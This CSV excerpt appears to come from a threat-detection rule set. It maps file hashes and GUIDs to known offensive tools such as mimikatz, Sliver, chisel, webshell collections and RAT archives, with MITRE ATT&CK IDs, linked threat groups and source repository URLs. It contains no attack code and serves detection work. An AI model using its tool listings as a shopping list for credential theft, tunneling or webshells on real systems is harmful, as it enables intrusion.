"*9f1186262760c8424674045530bb64d541acbd5a5364e5e56f23cae01243a59e*",".{0,1000}9f1186262760c8424674045530bb64d541acbd5a5364e5e56f23cae01243a59e.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","#filehash","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","32047"
"*9f17e90125023767fcb54bc9573f20b89a50772134e502f92832b6b00df68768*",".{0,1000}9f17e90125023767fcb54bc9573f20b89a50772134e502f92832b6b00df68768.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","32048"
"*9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69*",".{0,1000}9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","32049"
"*9f19635e335acf9c73acaa6754d100215f3a14a5dfb656abf9dd416237dd3b21*",".{0,1000}9f19635e335acf9c73acaa6754d100215f3a14a5dfb656abf9dd416237dd3b21.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32050"
"*9f1af0a9b870f562131c2dbb25a3fe416512b0d74b7e57a0f2dcc4b7039383bd*",".{0,1000}9f1af0a9b870f562131c2dbb25a3fe416512b0d74b7e57a0f2dcc4b7039383bd.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","32051"
"*9f25b9fee359a51b7ab3ac889decc51cdec9dcbeffb57a3e2001b9dd263062f1*",".{0,1000}9f25b9fee359a51b7ab3ac889decc51cdec9dcbeffb57a3e2001b9dd263062f1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32055"
"*9f25da71d888618eb41ff007df64538c1f9a81a717701e66481ef9b14394e09d*",".{0,1000}9f25da71d888618eb41ff007df64538c1f9a81a717701e66481ef9b14394e09d.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#filehash","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","32056"
"*9f299bf02ff7ee91ee018f04d40911db1d133bca6a38d3bf318ef9e51e91f71e*",".{0,1000}9f299bf02ff7ee91ee018f04d40911db1d133bca6a38d3bf318ef9e51e91f71e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32058"
"*9f2cef78b9133cc32d8ef9bb370a0fc73b8bc6a8182519b0715163a816c953ab*",".{0,1000}9f2cef78b9133cc32d8ef9bb370a0fc73b8bc6a8182519b0715163a816c953ab.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32062"
"*9f35e54b759b872926a8564d1b39f763a5a25015c70d401ed5f8acbe1fefe632*",".{0,1000}9f35e54b759b872926a8564d1b39f763a5a25015c70d401ed5f8acbe1fefe632.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32063"
"*9f3c1c73211ccb972f9d7e94a2130223cab43ffc7150ff432d1dafbb4a080eaf*",".{0,1000}9f3c1c73211ccb972f9d7e94a2130223cab43ffc7150ff432d1dafbb4a080eaf.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","32064"
"*9f42af7c49f77e716869186e182bee63348dd63dc9f407e08f0ff930a5e5b9db*",".{0,1000}9f42af7c49f77e716869186e182bee63348dd63dc9f407e08f0ff930a5e5b9db.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32065"
"*9f4885b3b55f370d05e9426ba900cfa8daaa785129d6d80e576d16e4d497f6c8*",".{0,1000}9f4885b3b55f370d05e9426ba900cfa8daaa785129d6d80e576d16e4d497f6c8.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","32066"
"*9f5c55028eb0ffa7dca229018a3fd7bd9eb5866449245910cce6f2695cec37d3*",".{0,1000}9f5c55028eb0ffa7dca229018a3fd7bd9eb5866449245910cce6f2695cec37d3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32068"
"*9F5CF56A-DDB2-4F40-AB99-2A1DC47588E1*",".{0,1000}9F5CF56A\-DDB2\-4F40\-AB99\-2A1DC47588E1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32069"
"*9f63e35d7b9d0814ad9f0ef23b89deb4f823d3b07bcd33df9abc5b957bb8be0f*",".{0,1000}9f63e35d7b9d0814ad9f0ef23b89deb4f823d3b07bcd33df9abc5b957bb8be0f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32071"
"*9f65528998b39f2e7239f89a56ded47ea865eea2d6b82b300cd5de7e62072cf0*",".{0,1000}9f65528998b39f2e7239f89a56ded47ea865eea2d6b82b300cd5de7e62072cf0.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32072"
"*9f6a38018fe8228de57605c35bb927d39418c7793bb935ff0ab5022424d9774a*",".{0,1000}9f6a38018fe8228de57605c35bb927d39418c7793bb935ff0ab5022424d9774a.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","32073"
"*9f6b1665f8bb3a07f8b63b31944376f3e92254dde22cfc4136e3be206b54cabe*",".{0,1000}9f6b1665f8bb3a07f8b63b31944376f3e92254dde22cfc4136e3be206b54cabe.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32074"
"*9f7accb636102b4d0ca9242739c24ae59e5eec9b8049db3c0149a9287fdb5373*",".{0,1000}9f7accb636102b4d0ca9242739c24ae59e5eec9b8049db3c0149a9287fdb5373.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32080"
"*9f7bb583f87b8cfc56d4319cdcfeb865c0db77a0f2110f87d5c694c7f7a0e514*",".{0,1000}9f7bb583f87b8cfc56d4319cdcfeb865c0db77a0f2110f87d5c694c7f7a0e514.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32081"
"*9f7bb583f87b8cfc56d4319cdcfeb865c0db77a0f2110f87d5c694c7f7a0e514*",".{0,1000}9f7bb583f87b8cfc56d4319cdcfeb865c0db77a0f2110f87d5c694c7f7a0e514.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32082"
"*9f7f5e0e8a05792800e0c53e361607df2359b6f1d21eba33d124ff44046946b9*",".{0,1000}9f7f5e0e8a05792800e0c53e361607df2359b6f1d21eba33d124ff44046946b9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32083"
"*9f8ba7d3f6abf2e98e5ec5e0257b65907a5f66b2d28ef80df212c347faaf1179*",".{0,1000}9f8ba7d3f6abf2e98e5ec5e0257b65907a5f66b2d28ef80df212c347faaf1179.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32085"
"*9f8e72805e95575c9875ba19a32fd3506c662883e35afd58bf7ac9c15e4088c2*",".{0,1000}9f8e72805e95575c9875ba19a32fd3506c662883e35afd58bf7ac9c15e4088c2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32086"
"*9f9039910ee089cd67d3771229526bdab9171ab559d73c2f97bd25da459c6155*",".{0,1000}9f9039910ee089cd67d3771229526bdab9171ab559d73c2f97bd25da459c6155.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32087"
"*9f9141f57f4d135a00557547091b73f9b13b0af2346082a243e65af90cb9be7e*",".{0,1000}9f9141f57f4d135a00557547091b73f9b13b0af2346082a243e65af90cb9be7e.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","32088"
"*9f93b709333b6a86108d0df9a408356389f6f619bc4ef5562c7478d203c9d956*",".{0,1000}9f93b709333b6a86108d0df9a408356389f6f619bc4ef5562c7478d203c9d956.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32089"
"*9f946bd0783019a56d2a6de29dd7a2ae1a2b62239396a99eca83b17e4010fc0d*",".{0,1000}9f946bd0783019a56d2a6de29dd7a2ae1a2b62239396a99eca83b17e4010fc0d.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","32090"
"*9f9587864f9b2929cf6af970170d36915110feb1e4c772529b8aa52e5b563d3a*",".{0,1000}9f9587864f9b2929cf6af970170d36915110feb1e4c772529b8aa52e5b563d3a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32091"
"*9f9619eb96a53d7166f5b853cbfe09c20d13d39e2b81cd14eb05f5240b42cce2*",".{0,1000}9f9619eb96a53d7166f5b853cbfe09c20d13d39e2b81cd14eb05f5240b42cce2.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","32092"
"*9f9675403c2be03232b1c3abe344bf0f4188454955ba89592be52ef77add4a39*",".{0,1000}9f9675403c2be03232b1c3abe344bf0f4188454955ba89592be52ef77add4a39.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","32093"
"*9f9b1672144c23acf6b5d94fbb84756253a0dc4240b19ff4b7c5e73e38c2e6e6*",".{0,1000}9f9b1672144c23acf6b5d94fbb84756253a0dc4240b19ff4b7c5e73e38c2e6e6.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","32094"
"*9f9b6e450c8c20f087105c41a845937e64401d40e5bdc06dfc38c0c2cfe8e7dd*",".{0,1000}9f9b6e450c8c20f087105c41a845937e64401d40e5bdc06dfc38c0c2cfe8e7dd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32095"
"*9fa36e9dbce91b0a9e691b8664ecce4953eebf7ce6260f71f5b9accc46694d70*",".{0,1000}9fa36e9dbce91b0a9e691b8664ecce4953eebf7ce6260f71f5b9accc46694d70.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32096"
"*9fa4e7fc4ff2efdc1fa89ec084b422fb8b57844a6c155c92a897767e835731ee*",".{0,1000}9fa4e7fc4ff2efdc1fa89ec084b422fb8b57844a6c155c92a897767e835731ee.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32098"
"*9fa884564bc924f3a31a3f8820a887dd1c26eef4a07511837d9bcf6843c24d69*",".{0,1000}9fa884564bc924f3a31a3f8820a887dd1c26eef4a07511837d9bcf6843c24d69.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32099"
"*9fa9202c24ff2eb3dd3dae886831de5799319e7f99ebc1f4a779832539b34560*",".{0,1000}9fa9202c24ff2eb3dd3dae886831de5799319e7f99ebc1f4a779832539b34560.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32101"
"*9fb43934f7fab913cd91847ca228bba739f98f58074bcedd50a912a71b313c5c*",".{0,1000}9fb43934f7fab913cd91847ca228bba739f98f58074bcedd50a912a71b313c5c.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","32102"
"*9fbe53eae88ccff8713e0c14e623352af0a7424e234499e6dfa6cf7455f83ae8*",".{0,1000}9fbe53eae88ccff8713e0c14e623352af0a7424e234499e6dfa6cf7455f83ae8.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32104"
"*9fc04e375ecd2d91dff8a0cd64fc10852bdca276699fd6d633b4e5537b7d5c5a*",".{0,1000}9fc04e375ecd2d91dff8a0cd64fc10852bdca276699fd6d633b4e5537b7d5c5a.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","32105"
"*9fc3fe230f30e5b9f9bb15065bf62269f494f51f744857d6b8ac90a9937f5bc0*",".{0,1000}9fc3fe230f30e5b9f9bb15065bf62269f494f51f744857d6b8ac90a9937f5bc0.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","32107"
"*9fc6a05224549777e8c241bb0cc5b3bab16974b977ed8d97b515698cb560d34c*",".{0,1000}9fc6a05224549777e8c241bb0cc5b3bab16974b977ed8d97b515698cb560d34c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32110"
"*9fd5c3497f76b260c02b579d0d5bf95cef10469e08b02d1b1172a046c35ea07d*",".{0,1000}9fd5c3497f76b260c02b579d0d5bf95cef10469e08b02d1b1172a046c35ea07d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32111"
